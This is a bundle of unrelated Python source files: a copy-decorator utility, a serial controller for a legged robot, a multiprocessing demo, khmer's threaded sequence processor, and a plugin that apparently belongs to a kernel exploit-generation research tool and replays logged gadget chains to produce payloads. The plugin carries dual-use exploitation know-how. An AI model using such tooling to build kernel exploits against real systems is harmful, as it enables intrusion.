Passing keyword arguments to the functions is not supported--use
lambdas instead. To call the functions as they are being iterated
over (as a generator), use `gen_run`.
Args:
*funcs: The objects to call.
Returns:
list: The output of the functions.
Examples:
>>> def f(a):
... print('ran f')
... return a + 5
>>> run(lambda: f(1), lambda: f(2))
ran f
ran f
[6, 7]
"""
return [func() for func in funcs]
def _copy_to_obj(src: T, dst: T, shallow_copy: bool = False):
"""Copy object `src` to object `dst`.
This will work for object using `__slots__` as well as `__dict__`.
"""
copy_func = copy if shallow_copy else deepcopy
if hasattr(src.__class__, '__slots__'):
for attr in src.__slots__:
if hasattr(src, attr):
setattr(dst, attr, copy_func(getattr(src, attr)))
else:
dst.__dict__ = copy_func(src.__dict__)
def copy_init(shallow_copy: bool = False):
"""This is a decorator that will allow an `__init__` method to copy another object.
This should only be used to decorate the `__init__` method of a
class. If `__init__` is called with only one argument that is an
object of the same class, that object's properties will be copied
instead of calling this object's `__init__` method. This means that
`__init__` will *not* be called when copying. This also means that
`__init__` does not need to have arguments after the first be
optional (__init__(self, x, y, z) if a perfectly valid signature).
This also works with classes that use `__slots__`.
Note that this decorator, when called without arguments, should not
be called with parenthsis at the end. e.g. `@copy_init` should be
used instead of `@copy_init()`.
When writing docstrings, it's recommended to mention the copying
behaviour and have the type annotation of the first argument be a
`typing.Union`.
Args:
use_deep_copy (bool): Use `copy.deep_copy` if true, otherwise
use `copy.copy`. Defaults to true.
Examples:
>>> class C:
... @copy_init
... def __init__(self, a, b):
... self.a = a
... self.b = b
...
... def __repr__(self):
... return f'C(a={self.a}, b={self.b})'
...
>>> C(1, 2)
C(a=1, b=2)
>>> eggs = C(1, 2)
>>> C(eggs)
C(a=1, b=2)
>>> # attributes will be `deep_copy`ed by default
>>> foo = C(0, [1, 2, 3])
>>> bar = C(foo)
>>> foo.b.append(4)
>>> foo
C(a=0, b=[1, 2, 3, 4])
>>> bar
C(a=0, b=[1, 2, 3])
>>> # with shallow copying
>>> class C:
... @copy_init(shallow_copy=True)
... def __init__(self, a, b):
... self.a = a
... self.b = b
...
... def __repr__(self):
... return f'C(a={self.a}, b={self.b})'
...
>>> foo = C(0, [1, 2, 3])
>>> bar = C(foo)
>>> foo.b.append(4)
>>> foo
C(a=0, b=[1, 2, 3, 4])
>>> bar
C(a=0, b=[1, 2, 3, 4])
"""
# if `shallow_copy` is callable, that means this decorator is being used without parentheses, so `shallow_copy` is
# the function that we're wrapping.
func = None
if callable(shallow_copy):
func = shallow_copy
shallow_copy = False
class Decorator:
def __init__(self, func):
self.func = func
def __set_name__(self, owner, name):
# here's some light reading on when `__set_name__` is called:
# https://docs.python.org/3/reference/datamodel.html#creating-the-class-object
nonlocal shallow_copy
@wraps(self.func)
def wrapper(wrapper_self, *args, **kwargs):
if not args:
self.func(wrapper_self, **kwargs)
else:
first = args[0]
if wrapper_self.__class__ is first.__class__:
_copy_to_obj(first, wrapper_self, shallow_copy)
else:
self.func(wrapper_self, *args, **kwargs)
setattr(owner, name, wrapper)
if func is not None:
return Decorator(func)
else:
return Decorator
if __name__ == '__main__':
import doctest
doctest.testmod()
|
menu.py
|
#!/usr/bin/python3
import time
import sys
import glob
import serial
import re
import threading
import queue
import os
from logging import getLogger, StreamHandler, FileHandler, Formatter, DEBUG
logger = getLogger(__name__)
logger.setLevel(DEBUG)
stream_formatter = Formatter('%(message)s')
stream_handler = StreamHandler()
stream_handler.setLevel(DEBUG)
stream_handler.setFormatter(stream_formatter)
logger.addHandler(stream_handler)
os.makedirs("./log",exist_ok=True)
log_file_name = "./log/log-" + time.strftime("%Y%m%d-%H%M%S", time.strptime(time.ctime()))+".txt"
file_handler = FileHandler(log_file_name)
file_handler.setLevel(DEBUG)
file_formatter = Formatter('[%(asctime)s] %(message)s')
file_handler.setFormatter(file_formatter)
logger.addHandler(file_handler)
logger.propagate = False
key_command_map = {
b'\t':["motion",[["left"]]],
b'/':["motion",[["right"]]],
b'*':["scenario",["walk"]],
b'\x08':["scenario",["back"]], # Windows
b'\x7f':["scenario",["back"]], # Linux
b'7':["motor_command",["up"]],
b'8':["motor_id",0],
b'9':["motor_id",3],
b'-':["motor_command",["move", 0]],
b'4':["motor_command",["down"]],
b'5':["motor_id",1],
b'6':["motor_id",4],
b'+':["motor_command",["move",100]],
b'1':["motion",[["stm_init"]]],
b'2':["motor_id",2],
b'3':["motor_id",5],
b'\r':["command",["stop"]],
b'0':["command",["clear"]],
b'.':["motor_id",999],
b'\x1b':["escape"],
b'[':["escape"]
}
linux_esc_key_command_map = {
b'H':["motor_command",["up"]],
b'A':["motor_id",0],
b'5':["motor_id",3],
b'D':["motor_command",["down"]],
b'E':["motor_id",1],
b'C':["motor_id",4],
b'F':["motion",[["stm_init"]]],
b'B':["motor_id",2],
b'6':["motor_id",5],
b'2':["command",["clear"]],
b'3':["motor_id",999],
b'\x1b':["escape"],
b'[':["escape"]
}
arduino_available = False
stm_available = False
legs = 0
scenario_repeat = 1
motor_height = []
motor_id_mapping = {}
id_motor_mapping = {}
default_motor_id_mapping_2legs = {0:"2",1:"5"}
#
# 2 legs (2番目と3番目のArduinoを外した状態)
#
# Front
# +-----+
# 0:"2" | | 2:"5"
# +-----+
# Back
#
default_motor_id_mapping_4legs = {0:"2",1:"3",2:"5",3:"6"}
#
# 4 legs (3番目のArduinoを外した状態)
#
# Front
# +-----+
# 0:"2" | | 2:"5"
# 1:"3" | | 3:"6"
# +-----+
# Back
#
# right: 0:"2",4:"6",2:"4"
# left : 3:"5",1:"3",5:"7"
#
default_motor_id_mapping_6legs = {0:"2",1:"3",2:"4",3:"5",4:"6",5:"7"}
#
# 6 legs
#
# Front
# +-----+
# 0:"2" | | 3:"5"
# 1:"3" | | 4:"6"
# 2:"4" | | 5:"7"
# +-----+
# Back
#
# right: 0:"2",4:"6",2:"4"
# left : 3:"5",1:"3",5:"7"
#
arduino_id_mapping = {}
scenario_walk = [
[["right"]],
[["wait",2.0]],
[["move",0,0,1],
["move",4,0,1],
["move",2,0,1]],
[["wait",1.0]],
[["move",3,100,1],
["move",1,100,1],
["move",5,100,1]],
[["wait",1.0]],
[["left"]],
[["wait",2.0]],
[["move",3,0,1],
["move",1,0,1],
["move",5,0,1]],
[["wait",1.0]],
[["move",0,100,1],
["move",4,100,1],
["move",2,100,1]],
[["wait",1.0]]
]
scenario_back = [
[["left"]],
[["wait",5.0]],
[["move",0,0,1], ["move",3,0,0],
["move",1,0,0], ["move",4,0,1],
["move",2,0,1], ["move",5,0,0]],
[["wait",5.0]],
[["right"]],
[["wait",5.0]],
[["move",0,100,0], ["move",3,100,1],
["move",1,100,1], ["move",4,100,0],
["move",2,100,0], ["move",5,100,1]],
[["wait",5.0]]
]
arduino_ports = []
stm_ports = []
arduino_ser = []
stm_ser = []
class _Getch:
"""Gets a single character from standard input. Does not echo to the
screen."""
def __init__(self):
try:
self.impl = _GetchWindows()
except ImportError:
self.impl = _GetchUnix()
def __call__(self): return self.impl()
class _GetchUnix:
def __init__(self):
import tty, sys
def __call__(self):
import sys, tty, termios
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch.encode('utf-8')
class _GetchWindows:
def __init__(self):
import msvcrt
def __call__(self):
import msvcrt
return msvcrt.getch()
def serial_ports():
""" Lists serial port names
:raises EnvironmentError:
On unsupported or unknown platforms
:returns:
A list of the serial ports available on the system
"""
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(32)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this excludes your current terminal "/dev/tty"
ports = ['/dev/ttyUSB0','/dev/ttyUSB1','/dev/ttyUSB2','/dev/ttyACM0']
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
def setup_serial_ports():
logger.debug("************************************")
logger.debug(" serial port set up start !! ")
logger.debug("************************************")
# detect arduino or stm
comlist = serial_ports()
temp_arduino_ports = []
logger.debug(comlist)
for port in comlist:
logger.debug(port)
ser = serial.Serial(port, 115200,timeout=5.0)
#if port == "/dev/ttyACM0":
# stm_ports.append(port)
# continue
line = ser.readline()
ser.write(b"who:\r\n")
logger.debug("[S] who:\r\n")
start_time = current_time = time.time()
search_arduino_ids = False
while current_time - start_time < 60.0:
line = ser.readline()
if len(line) > 0:
logger.debug("[R] %s" %line)
if not search_arduino_ids:
result = re.search(b"arduino",line)
if result:
logger.debug("arduino")
ser.write(b"info:,\r\n")
search_arduino_ids = True
else:
id0 = ((re.findall(b"id0,[1-9]+",line))[0])[4:]
id1 = ((re.findall(b"id1,[1-9]+",line))[0])[4:]
if id0 and id1:
logger.debug("port id0 = %s, id1 = %s" %(id0,id1))
temp_arduino_ports.append([port,id0,id1])
break
result = re.search(b"stm",line)
if result:
logger.debug("stm")
stm_ports.append(port)
break
time.sleep(0.1)
current_time = time.time()
ser.close()
# motor id check and assign id to detected and sorted port
i = 0
for port in sorted(temp_arduino_ports,key=lambda x:x[1]):
arduino_ports.append(port[0])
if port[1].decode('utf-8') in default_motor_id_mapping_6legs.values():
motor_id_mapping.setdefault(i,port[1].decode('utf-8'))
id_motor_mapping.setdefault(port[1].decode('utf-8'),i)
arduino_id_mapping.setdefault(port[1].decode('utf-8'),i)
else:
logger.debug("id mismatch happens !!")
exit()
if port[2].decode('utf-8') in default_motor_id_mapping_6legs.values():
motor_id_mapping.setdefault(i+len(temp_arduino_ports),port[2].decode('utf-8'))
id_motor_mapping.setdefault(port[2].decode('utf-8'),i+len(temp_arduino_ports))
arduino_id_mapping.setdefault(port[2].decode('utf-8'),i)
else:
logger.debug("id mismatch happens !!")
exit()
i = i + 1
logger.debug("arduino_ports = %s" % arduino_ports)
logger.debug("motor_id_mapping = %s" % motor_id_mapping)
logger.debug("id_motor_mapping = %s" % id_motor_mapping)
logger.debug("arduino_id_mapping = %s" % arduino_id_mapping)
logger.debug("stm_ports = %s" % stm_ports)
# opening serial ports
if len(arduino_ports) > 0:
for i in range(len(arduino_ports)):
for _ in range(5):
try:
s = serial.Serial(arduino_ports[i], 115200,timeout=2.0)
break
except (OSError, serial.SerialException):
time.sleep(1.0)
pass
arduino_ser.append(s)
if len(stm_ports) > 0:
for i in range(len(stm_ports)):
for _ in range(5):
try:
s = serial.Serial(stm_ports[i], 115200,timeout=2.0)
break
except (OSError, serial.SerialException):
time.sleep(1.0)
pass
stm_ser.append(s)
logger.debug("************************************")
logger.debug(" port set up end !! ")
logger.debug("************************************")
def arduino_command(command,sender_queue):
if arduino_available == False:
return
if command[0] == "move":
if len(command) == 4:
item = "legM:id,{0}:xmm,{1}:payload,{2}\r\n".format(motor_id_mapping[command[1]],command[2],command[3])
elif len(command) == 3:
item = "legM:id,{0}:xmm,{1}:payload,{2}\r\n".format(motor_id_mapping[command[1]],command[2],motor_height[command[1]])
sender_queue[arduino_id_mapping[motor_id_mapping[command[1]]]].put(item)
time.sleep(0.005)
sender_queue[arduino_id_mapping[motor_id_mapping[command[1]]]].put(item)
time.sleep(0.005)
sender_queue[arduino_id_mapping[motor_id_mapping[command[1]]]].put(item)
else:
item = "None"
pass
logger.debug("[S] arduino[%1d]: %s" %(arduino_id_mapping[motor_id_mapping[command[1]]] ,item))
time.sleep(0.010)
def stm_command(command,sender_queue):
if stm_available == False:
return
if command[0] == "stm_init":
item = "init\r\n"
for i in range(legs):
motor_height[i] = 1
sender_queue[len(arduino_ports)].put(item)
elif command[0] == "right":
if legs == 6:
#item = "right\r\n"
item = "aa\r\n"
for i in range(legs):
motor_height[i] = i % 2
sender_queue[len(arduino_ports)].put(item)
else:
item = "None"
elif command[0] == "left":
if legs == 6:
#item = "left\r\n"
item = "bb\r\n"
for i in range(legs):
motor_height[i] = (i + 1) % 2
sender_queue[len(arduino_ports)].put(item)
else:
item = "None"
elif command[0] == "up":
item = "up {}\r\n".format(command[1])
motor_height[command[1]] = 0
sender_queue[len(arduino_ports)].put(item)
elif command[0] == "down":
item = "down {}\r\n".format(command[1])
motor_height[command[1]] = 1
sender_queue[len(arduino_ports)].put(item)
else:
item = "None"
if item != "None":
logger.debug("[S] stm: %s" % item)
logger.debug("motor_height: %s" % motor_height)
time.sleep(0.002)
def sender(queue,ser):
while True:
item = queue.get()
if item is None:
queue.task_done()
break
ser.write(item.encode('utf-8'))
while ser.out_waiting > 0:
time.sleep(0.002)
def reader(ser,number):
while ser.isOpen():
try:
line = ser.readline()
time.sleep(0.001)
except:
if number < len(arduino_ports):
logger.debug("arduino[%d] exception" %number)
else:
logger.debug("stm port exception")
break
else:
if len(line) > 0:
if number < len(arduino_ports):
logger.debug("[R] arduino[%d]: %s" %(number,line))
else:
logger.debug("[R] stm: %s" % line)
time.sleep(0.001)
if number < len(arduino_ports):
logger.debug("arduino[%d] port closed" %number)
else:
logger.debug("stm port closed")
def motion_player(motion,sender_queue):
logger.debug("motion :: %s" % motion)
for command in motion:
if command[0] == "stm_init":
stm_command(command,sender_queue)
elif command[0] == "right":
stm_command(command,sender_queue)
elif command[0] == "left":
stm_command(command,sender_queue)
elif command[0] == "up":
stm_command(command,sender_queue)
elif command[0] == "down":
stm_command(command,sender_queue)
elif command[0] == "move":
arduino_command(command,sender_queue)
elif command[0] == "wait":
time.sleep(command[1])
else:
pass
def scenario_player(scenario,sender_queue):
logger.debug("************************************")
logger.debug(" scenario start !! ")
logger.debug("************************************")
if stm_available and legs == 6:
for i in range(scenario_repeat):
logger.debug("---- turn %d / %d ----" % (i+1,scenario_repeat))
for motion in scenario:
motion_player(motion,sender_queue)
else:
pass
logger.debug("************************************")
logger.debug(" scenario end !! ")
logger.debug("************************************")
def menu(sender_queue):
logger.debug("************************************")
logger.debug(" start menu ")
logger.debug("************************************")
escape_mode = False
motor_id = -1
getch = _Getch()
while True:
key = getch()
logger.debug('{0} pressed'.format(key))
if key == b'\x03':
break
if key == b'q':
break
if escape_mode == False and key in key_command_map:
command = key_command_map[key]
elif escape_mode == True and key in linux_esc_key_command_map:
command = linux_esc_key_command_map[key]
else:
continue
if command[0] == "escape":
escape_mode = True
elif command[0] == "scenario":
logger.debug("scenario {}".format(command[1]))
if command[1] == ["walk"]:
scenario_player(scenario_walk,sender_queue)
elif command[1] == ["back"]:
scenario_player(scenario_back,sender_queue)
else:
pass
motor_id = -1
escape_mode = False
elif command[0] == "motion":
logger.debug("motion {}".format(command[1]))
motion_player(command[1],sender_queue)
motor_id = -1
escape_mode = False
elif command[0] == "motor_command":
logger.debug("motor_command {}".format(command[1]))
if motor_id == -1 :
logger.debug("motor_id is not set")
pass
elif motor_id < 999:
if command[1] == ["up"]:
motor_command = [["up",motor_id]]
motion_player(motor_command, sender_queue)
elif command[1] == ["down"]:
motor_command = [["down",motor_id]]
motion_player(motor_command, sender_queue)
elif command[1] == ["move",0]:
motor_command = [["move",motor_id,0]]
motion_player(motor_command, sender_queue)
elif command[1] == ["move",100]:
motor_command = [["move",motor_id,100]]
motion_player(motor_command, sender_queue)
else:
pass
elif motor_id == 999:
if command[1] == ["up"]:
for i in range(legs):
motor_command = [["up",i]]
motion_player(motor_command, sender_queue)
elif command[1] == ["down"]:
for i in range(legs):
motor_command = [["down",i]]
motion_player(motor_command, sender_queue)
elif command[1] == ["move",0]:
for i in range(legs):
motor_command = [["move",i,0,1]]
motion_player(motor_command, sender_queue)
elif command[1] == ["move",100]:
for i in range(legs):
motor_command = [["move",i,100,1]]
motion_player(motor_command, sender_queue)
else:
pass
escape_mode = False
elif command[0] == "motor_id":
motor_id = command[1]
if motor_id in motor_id_mapping.keys():
logger.debug("motor_id is set as {}".format(motor_id_mapping[command[1]]))
elif motor_id == 999:
logger.debug("motor_id is set as all")
else:
logger.debug("motor_id is invalid")
motor_id = -1
escape_mode = False
elif command[0] == "command":
if command[1] == ["clear"]:
logger.debug("motor_id is cleared")
elif command[1] == ["stop"]:
logger.debug("reboot !!")
os.system("sudo reboot")
else:
pass
motor_id = -1
escape_mode = False
else:
escape_mode = False
logger.debug("************************************")
logger.debug(" end menu ")
logger.debug("************************************")
if __name__ == '__main__':
logger.debug("waiting for 10 sec")
time.sleep(10.0)
setup_serial_ports()
if len(arduino_ports) > 0:
arduino_available = True
legs = len(arduino_ports) * 2
if len(stm_ports) > 0:
stm_available = True
if arduino_available == False and stm_available == False:
logger.debug("No port is available")
exit()
for i in range(legs):
motor_height.append(1) # 0:float 1:ground
if legs < 6 and legs > 0:
try:
key_command_map[b'8'] = ["motor_id",id_motor_mapping['2']]
except:
key_command_map[b'8'] = ["motor_id",6]
try:
key_command_map[b'9'] = ["motor_id",id_motor_mapping['5']]
except:
key_command_map[b'9'] = ["motor_id",6]
try:
key_command_map[b'5'] = ["motor_id",id_motor_mapping['3']]
except:
key_command_map[b'5'] = ["motor_id",6]
try:
key_command_map[b'6'] = ["motor_id",id_motor_mapping['6']]
except:
key_command_map[b'6'] = ["motor_id",6]
try:
key_command_map[b'2'] = ["motor_id",id_motor_mapping['4']]
except:
key_command_map[b'2'] = ["motor_id",6]
try:
key_command_map[b'3'] = ["motor_id",id_motor_mapping['7']]
except:
key_command_map[b'3'] = ["motor_id",6]
# start threads
sender_queue = []
ts = []
rs = []
for i in range(len(arduino_ports)):
sender_queue.append(queue.Queue())
ser = arduino_ser[i]
ser.flush()
t = threading.Thread(target=sender,args=(sender_queue[i],ser,))
r = threading.Thread(target=reader,args=(ser,i,))
t.setDaemon(True)
r.setDaemon(True)
ts.append(t)
rs.append(r)
t.start()
r.start()
if stm_available:
for i in range(len(stm_ports)):
sender_queue.append(queue.Queue())
ser = stm_ser[i]
ser.flush()
t = threading.Thread(target=sender,args=(sender_queue[i+ len(arduino_ports)],ser,))
r = threading.Thread(target=reader,args=(ser,i + len(arduino_ports),))
t.setDaemon(True)
r.setDaemon(True)
ts.append(t)
rs.append(r)
t.start()
r.start()
time.sleep(2)
menu(sender_queue)
logger.debug("closing ports")
# stop sender queue
for _ in range(3):
for q in sender_queue:
q.put(None)
# stop serial ports and threads
for t in ts:
t.join()
if len(arduino_ser):
for ser in arduino_ser:
ser.close()
if stm_available:
if len(stm_ser):
for ser in stm_ser:
ser.close()
for r in rs:
r.join()
logger.debug("Done!!")
|
_exploit_generation.py
|
"""
filename: _exploit_generation.py
author: ww9210
This plugin is used to reproduce the gadget chain and generate concrete payload discovered in previous phase.
We do not generate concrete payload during exploration because such constraint solving will eat a lot of memeoy space
This file does not handle the detail of payload generation, instead, those implementations are in _payload_generation.py
"""
from IPython import embed
import angr
from multiprocessing import Process
from os import listdir
from os.path import isfile, join
class ExploitGenererationMixin:
def parse_gadget_chain_log(self, gadget_chain_log):
"""
get gadget from the log file
:param gadget_chain_log:
:return:
"""
'''
self.disclosure_gadgets = pickle.load(open(disclosure_gadget_path, 'rb'))
self.fake_stack_gadgets = pickle.load(open(fake_stack_gadget_path, 'rb'))
self.smash_gadgets = pickle.load(open(smash_gadget_path, 'rb'))
self.bloom_gadgets = pickle.load(open(bloom_gadget_path, 'rb'))
self.fork_gadgets = pickle.load(open(fork_gadget_path, 'rb'))
'''
with open(gadget_chain_log,'r') as f:
log = f.readlines()
'''
blooming gadget:event_sched_out
forking gadget:em_call
prologue gadget:tg3_get_5720_nvram_info
disclosure gadget:mmc_ioctl_dvd_auth
smash gadget:fb_set_user_cmap
'''
bloom_gadget_name = log[0].split(':')[1].strip('\n')
forking_gadget_name = log[1].split(':')[1].strip('\n')
prologue_gadget_name = log[2].split(':')[1].strip('\n')
disclosure_gadget_name = log[3].split(':')[1].strip('\n')
smash_gadget_name = log[4].split(':')[1].strip('\n')
timestamp = int(log[5].strip('\n'), 16)
self.current_timestamp = timestamp
good_bloom_gadget_idx = -1
good_forking_gadget_idx = -1
good_prologue_disclosure_pair_idx = -1
good_smash_gadget_idx = -1
for i, bloom_gadget in enumerate(self.bloom_gadgets):
if bloom_gadget[1] == bloom_gadget_name:
good_bloom_gadget_idx = i
self.current_bloom_gadget_to_reproduce = bloom_gadget # set current bloom gadget to reproduce
break
if good_bloom_gadget_idx == -1:
assert 0 # wtf
# get forking
for i, forking_gadget in enumerate(self.fork_gadgets):
if forking_gadget[1] == forking_gadget_name:
good_forking_gadget_idx = i
self.current_forking_gadget_to_reproduce = forking_gadget # set current forking gadget to reproduce
break
if good_forking_gadget_idx == -1:
print(forking_gadget_name, forking_gadget_name.encode('hex'))
assert 0 # wtf
# get good prologue disclosure pair to reproduce from the log
self.current_prologue_disclosure_pair_to_reproduce = []
for i, prologue_disclosure_pair in enumerate(self.prologue_disclosure_pairs):
prologue_gadget = prologue_disclosure_pair[0]
disclosure_gadget = prologue_disclosure_pair[1]
if prologue_gadget[5] == prologue_gadget_name and disclosure_gadget[3] == disclosure_gadget_name:
good_prologue_disclosure_pair_idx = i
self.current_prologue_disclosure_pair_to_reproduce.append(prologue_disclosure_pair)
if good_prologue_disclosure_pair_idx == -1:
assert 0
# get current smash gadget to reproduce
self.current_smash_gadget_to_reproduce = []
for i, smash_gadget in enumerate(self.smash_gadgets):
if smash_gadget[3] == smash_gadget_name:
good_smash_gadget_idx = i
self.current_smash_gadget_to_reproduce.append(smash_gadget) # set current smash gadget to reproduce
if good_smash_gadget_idx == -1:
assert 0 # wtf
return
def update_gadget_candidate_list(self):
"""
replace gadget candidate list
:return:
"""
self.bloom_gadgets = []
self.fork_gadgets = []
self.prologue_disclosure_pairs = []
self.smash_gadgets = []
# put gadget chain to reproduce to candicate list
self.bloom_gadgets.append(self.current_bloom_gadget_to_reproduce)
self.fork_gadgets.append(self.current_forking_gadget_to_reproduce)
for pair in self.current_prologue_disclosure_pair_to_reproduce:
self.prologue_disclosure_pairs.append(pair)
for smash_gadget in self.current_smash_gadget_to_reproduce:
self.smash_gadgets.append(smash_gadget)
return
def update_generated_payload_number(self):
"""
update num of generated payload so we won't overwrite generated payloads
:return:
"""
payload_path = self.payload_path
mypath = payload_path
onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]
f_cnt = 0
for fn in onlyfiles:
if 'info_' in fn:
f_cnt += 1
self.num_of_generate_payload = f_cnt
def reproduce_an_exploit(self, gadget_chain_log_filename=None, debug_dfs=False):
if gadget_chain_log_filename is None:
return
# get gadget chain to reproduce from log
self.parse_gadget_chain_log(gadget_chain_log_filename)
# replace gadget list to test
self.update_gadget_candidate_list()
# set several global variables
self.current_log_to_reproduce = gadget_chain_log_filename
self.is_dfs_search_routine = True
self.debug_dfs = debug_dfs
self.reproduce_mode = True
# start reproducing
self._bloom(start_bloom_idx=0)
return
def reproduce_all_log_in_a_dir(self, number_to_reproduce=None, use_subprocess=True, gadget_chain_log_dir=None):
"""
:param gadget_chain_log_dir: path of generated logs to reproduce
:return:
"""
# firstly update the total number of payloads we already reproduced
# respect the flow of osok_dfs, but not necessary here
self.prologue_disclosure_pairs = self.get_prologue_disclosure_pairs()
# load qemu snapshot
self.load_hyper_parameters()
self.load_qemu_snapshot()
self.initial_state = self.get_initial_state(control_memory_base=self.controlled_memory_base)
if gadget_chain_log_dir is None:
return
mypath = gadget_chain_log_dir
onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]
files_with_full_path = [join(mypath, f) for f in listdir(mypath)]
for fn in files_with_full_path:
self.update_generated_payload_number()
if 'info_' in fn:
print('[+] generating exploit for', fn)
if use_subprocess:
p = Process(target=self.reproduce_an_exploit, args=(fn, False))
p.start()
p.join()
else:
self.reproduce_an_exploit(fn, False)
return
|
demo09.py
|
# -*- coding: utf-8 -*-
from multiprocessing import Process, freeze_support
def f():
print('hello world')
if __name__ == '__main__':
freeze_support()
Process(target=f).start()
|
thread_utils.py
|
# This file is part of khmer, https://github.com/dib-lab/khmer/, and is
# Copyright (C) 2011-2015, Michigan State University.
# Copyright (C) 2015-2016, The Regents of the University of California.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the Michigan State University nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Contact: khmer-project@idyll.org
# pylint: disable=missing-docstring,too-few-public-methods
"""Utilities for dealing with multithreaded processing of short reads."""
import threading
import sys
import screed
import khmer
from khmer.utils import write_record, check_is_pair
from khmer.khmer_logger import log_info
# stdlib queue module was renamed on Python 3
try:
import queue
except ImportError:
import Queue as queue
DEFAULT_WORKER_THREADS = 8
DEFAULT_GROUPSIZE = 100
def verbose_loader(filename):
"""Read iterator that additionally prints progress info to stderr."""
for num, record in enumerate(khmer.ReadParser(filename)):
if num % 100000 == 0:
log_info('... filtering {num}', num=num)
yield record
verbose_fasta_iter = verbose_loader # pylint: disable=invalid-name
class SequenceGroup(object):
def __init__(self, order, seqlist):
self.order = order
self.seqlist = seqlist
class ThreadedSequenceProcessor(object):
# pylint: disable=too-many-instance-attributes
QUEUESIZE = 50
def __init__(self, process_fn, n_workers=DEFAULT_WORKER_THREADS,
group_size=DEFAULT_GROUPSIZE, verbose=True):
self.process_fn = process_fn
self.n_workers = n_workers
self.group_size = group_size
self.inqueue = queue.Queue(self.QUEUESIZE)
self.outqueue = queue.Queue(self.QUEUESIZE)
self.worker_count = 0
self.worker_count_lock = threading.Lock()
self.done = False
self.verbose = verbose
self.n_processed = 0
self.n_written = 0
self.bp_processed = 0
self.bp_written = 0
self.tallies_lock = threading.Lock()
def start(self, inputiter, outfp):
if self.verbose:
print('starting threads', file=sys.stderr)
try:
for _ in range(self.n_workers):
thread = threading.Thread(target=self.do_process)
self.worker_count += 1
thread.start()
if self.verbose:
print('starting writer', file=sys.stderr)
writer = threading.Thread(target=self.do_write, args=(outfp,))
writer.start()
if self.verbose:
print('loading...', file=sys.stderr)
self.push_sequences(inputiter)
if self.verbose:
print('done loading in sequences', file=sys.stderr)
self.done = True
writer.join()
except Exception:
self.done = True
raise
def push_sequences(self, inputiter):
batch = []
last_record = None
i = 0
for record in inputiter:
if i >= self.group_size:
# keep pairs together in batches, to retain the interleaving.
if check_is_pair(last_record, record):
batch.append(record)
grouping = SequenceGroup(0, batch)
self.inqueue.put(grouping)
batch = []
else:
grouping = SequenceGroup(0, batch)
self.inqueue.put(grouping)
batch = [record]
i = 0
else:
batch.append(record)
last_record = record
i += 1
# submit last set of sequences
if batch:
grouping = SequenceGroup(0, batch)
self.inqueue.put(grouping)
def do_process(self):
inq = self.inqueue
while not self.done or not inq.empty():
try:
grouping = inq.get(True, 1)
except queue.Empty:
continue
bp_processed = 0
bp_written = 0
keep = []
for record in grouping.seqlist:
name, sequence = self.process_fn(record)
bp_processed += len(record.sequence)
if name:
quality = None
if hasattr(record, 'quality'):
quality = record.quality[:len(sequence)]
bp_written += len(sequence)
keep.append((name, sequence, quality))
self.outqueue.put(SequenceGroup(0, keep))
# the tallies are shared among workers, hence we lock
with self.tallies_lock:
self.n_processed += len(grouping.seqlist)
self.n_written += len(keep)
self.bp_processed += bp_processed
self.bp_written += bp_written
if self.verbose and self.n_processed % 500000 == 0:
print("processed %d / wrote %d / removed %d" %
(self.n_processed, self.n_written,
self.n_processed - self.n_written), file=sys.stderr)
print("processed %d bp / wrote %d bp / removed %d bp" %
(self.bp_processed, self.bp_written,
self.bp_processed - self.bp_written),
file=sys.stderr)
discarded = self.bp_processed - self.bp_written
percent = float(discarded) / float(self.bp_processed) * 100
print("discarded %.1f%%" % percent, file=sys.stderr)
# end of thread; exit, decrement worker count.
with self.worker_count_lock:
self.worker_count -= 1
def do_write(self, outfp):
outq = self.outqueue
while self.worker_count > 0 or not outq.empty():
try:
grouping = outq.get(True, 1)
except queue.Empty:
continue
for name, seq, qual in grouping.seqlist:
if qual:
record = screed.Record(name=name, sequence=seq,
quality=qual)
else:
record = screed.Record(name=name, sequence=seq)
write_record(record, outfp)
if self.verbose:
print("DONE writing.\nprocessed %d / wrote %d / removed %d" %
(self.n_processed, self.n_written,
self.n_processed - self.n_written), file=sys.stderr)
print("processed %d bp / wrote %d bp / removed %d bp" %
(self.bp_processed, self.bp_written,
self.bp_processed - self.bp_written), file=sys.stderr)
discarded = self.bp_processed - self.bp_written
percent = float(discarded) / float(self.bp_processed) * 100
print("discarded %.1f%%" % percent, file=sys.stderr)
# vim: set filetype=python tabstop=4 softtabstop=4 shiftwidth=4 expandtab:
# vim: set textwidth=79:
|
run_nvmf.py
|
